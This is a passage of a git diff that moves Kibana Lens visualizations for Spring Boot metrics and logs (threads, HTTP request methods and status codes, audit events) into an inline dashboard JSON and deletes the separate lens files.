"customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Session ID", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.session_id" + }, + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081": { + "customLabel": true, + "dataType": "string", + 
"isBucketed": false, + "label": "Authentication type", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + }, + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": false, + "interval": "1s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a84b9b2d-8712-4975-a242-7996161a71da": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Principal", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.principal" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "a84b9b2d-8712-4975-a242-7996161a71da", + "hidden": false, + "isTransposed": false, + "width": 166 + }, + { + "alignment": "center", + "columnId": "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "isTransposed": false, + "width": 183.41666666666669 + }, + { + "alignment": "center", + "columnId": "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081", + "isTransposed": false, + "width": 296.41666666666674 + }, + { + "alignment": "center", + "columnId": "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": 
"769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "isTransposed": false, + "width": 128.16666666666652 + }, + { + "alignment": "center", + "columnId": "52932019-4385-469b-9f4d-6becd3a912f6", + "isTransposed": false + } + ], + "fitRowToContent": true, + "layerId": "41dbf555-e40a-45dc-83d7-18b18263e8de", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + }, + "rowHeight": "auto", + "rowHeightLines": 2, + "sorting": { + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "direction": "desc" + } + } + }, + "title": "Audit Events [Logs Spring Boot]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd", - "name": "47822937-f8de-43cd-8000-b0c08d933804:panel_47822937-f8de-43cd-8000-b0c08d933804", - "type": "lens" + "gridData": { + "h": 14, + "i": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", + "w": 31, + "x": 0, + "y": 29 }, - { - "id": "spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd", - "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:panel_16610775-6aaa-4759-a3eb-a67c55f5d780", - "type": "lens" + "panelIndex": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "59a904ae-9fcd-4d06-b201-09117b1981d6": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of 
http.request.method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9a043bf0-329d-4632-a095-86760550bd75", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": true, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6" + ], + "metrics": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ] + } + ], + "shape": "pie" + } + }, + "title": "HTTP Request method types [Metrics Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00", - 
"name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:panel_1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "type": "lens" + "gridData": { + "h": 14, + "i": "7549bdf0-d5de-4851-9e9f-867a65684052", + "w": 17, + "x": 31, + "y": 29 }, - { - "id": "spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd", - "name": "7549bdf0-d5de-4851-9e9f-867a65684052:panel_7549bdf0-d5de-4851-9e9f-867a65684052", - "type": "lens" - } + "panelIndex": "7549bdf0-d5de-4851-9e9f-867a65684052", + "title": "HTTP Request method types [Logs Spring Boot]", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Overview Dashboard", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:197542f3-0a77-4046-a21d-9e87d097f9d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:0e57fdc9-82ca-45c5-bdfa-57704436ea9a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:0a93fba6-6f3f-4f2c-a19e-ead075b97111", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "b55e357e-4c45-430c-ae63-2c6facaabc2e:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "b55e357e-4c45-430c-ae63-2c6facaabc2e:indexpattern-datasource-layer-786d6832-6c69-42e4-916f-df6df259fad1", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "47822937-f8de-43cd-8000-b0c08d933804:indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "47822937-f8de-43cd-8000-b0c08d933804:8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": 
"index-pattern", + "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:ba5b5f52-398a-48c9-8021-520aa78ccdba", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "7549bdf0-d5de-4851-9e9f-867a65684052:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "7549bdf0-d5de-4851-9e9f-867a65684052:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "7549bdf0-d5de-4851-9e9f-867a65684052:76ee3705-3872-45f3-8cbf-f0595d97905d", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 55096d79b96..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,135 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { - "columnOrder": [ - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", - "522f8dd4-2bc7-4665-9b33-83609e4f3125" - ], - "columns": { - "522f8dd4-2bc7-4665-9b33-83609e4f3125": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Current Threads", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.count" - }, - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "522f8dd4-2bc7-4665-9b33-83609e4f3125" - ], - "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - 
"valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Current Threads" - } - }, - "title": "Current threads [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:25.266Z", - "id": "spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 15bd8116ca2..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,135 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { - "columnOrder": [ - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", - "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" - ], - "columns": { - "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Daemon Threads", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.daemon" - }, - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "702499ca-434e-41d4-b9a1-1d0bb27b244a", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" - ], - "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - 
"valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Daemon Threads" - } - }, - "title": "Daemon threads [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:41.413Z", - "id": "spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "702499ca-434e-41d4-b9a1-1d0bb27b244a", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index bf7569e3746..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,142 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { - "columnOrder": [ - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", - "bd774bf7-35bf-4dd7-a647-897d8b5945df" - ], - "columns": { - "bd774bf7-35bf-4dd7-a647-897d8b5945df": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Threads", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.started" - }, - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "bd774bf7-35bf-4dd7-a647-897d8b5945df" - ], - "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" - } - ], - "legend": { - "isInside": false, - "isVisible": true, - "legendSize": "auto", - "maxLines": 1, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": 
"line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Total Threads" - } - }, - "title": "Threads [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:08.989Z", - "id": "spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 16f3c421f12..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd.json +++ /dev/null 
@@ -1,169 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { - "columnOrder": [ - "2dbf54bf-2147-4302-902b-a176ae9df338", - "21757728-2591-42a8-bed5-10cc5c097d85", - "9a043bf0-329d-4632-a095-86760550bd75" - ], - "columns": { - "21757728-2591-42a8-bed5-10cc5c097d85": { - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code", - "operationType": "range", - "params": { - "maxBars": "auto", - "ranges": [ - { - "from": 0, - "label": "", - "to": 1000 - } - ], - "type": "histogram" - }, - "scale": "interval", - "sourceField": "http.response.status_code" - }, - "2dbf54bf-2147-4302-902b-a176ae9df338": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "1m" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "9a043bf0-329d-4632-a095-86760550bd75": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ba5b5f52-398a-48c9-8021-520aa78ccdba", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - 
"9a043bf0-329d-4632-a095-86760550bd75" - ], - "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "21757728-2591-42a8-bed5-10cc5c097d85", - "xAccessor": "2dbf54bf-2147-4302-902b-a176ae9df338" - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "showSingleSeries": false, - "verticalAlignment": "top" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "HTTP Request status code [Logs Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ba5b5f52-398a-48c9-8021-520aa78ccdba", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00.json b/packages/spring_boot/kibana/lens/spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00.json deleted file mode 100644 index c86e9da7ff5..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00.json +++ /dev/null 
@@ -1,216 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "41dbf555-e40a-45dc-83d7-18b18263e8de": { - "columnOrder": [ - "3624c7a7-411d-4138-9fdf-8b8a0694d285", - "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", - "a84b9b2d-8712-4975-a242-7996161a71da", - "5209c821-5ae2-40d6-b2c5-321b76c96ebc", - "52932019-4385-469b-9f4d-6becd3a912f6", - "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081" - ], - "columns": { - "3624c7a7-411d-4138-9fdf-8b8a0694d285": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100 values of spring_boot.audit_events.document_id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 100 - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.document_id" - }, - "5209c821-5ae2-40d6-b2c5-321b76c96ebc": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Host", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.data.remote_address" - }, - "52932019-4385-469b-9f4d-6becd3a912f6": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Session ID", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.data.session_id" - }, - "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Authentication type", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.type" - }, - "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8": { - 
"dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": false, - "interval": "1s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a84b9b2d-8712-4975-a242-7996161a71da": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Principal", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.principal" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.audit_events" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.audit_events" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "a84b9b2d-8712-4975-a242-7996161a71da", - "hidden": false, - "isTransposed": false, - "width": 166 - }, - { - "alignment": "center", - "columnId": "5209c821-5ae2-40d6-b2c5-321b76c96ebc", - "isTransposed": false, - "width": 183.41666666666669 - }, - { - "alignment": "center", - "columnId": "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081", - "isTransposed": false, - "width": 296.41666666666674 - }, - { - "alignment": "center", - "columnId": "3624c7a7-411d-4138-9fdf-8b8a0694d285", - "hidden": true, - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", - "isTransposed": false, - "width": 128.16666666666652 - }, - { - "alignment": "center", - "columnId": "52932019-4385-469b-9f4d-6becd3a912f6", - "isTransposed": false - } - ], - "fitRowToContent": true, - "layerId": "41dbf555-e40a-45dc-83d7-18b18263e8de", - "layerType": 
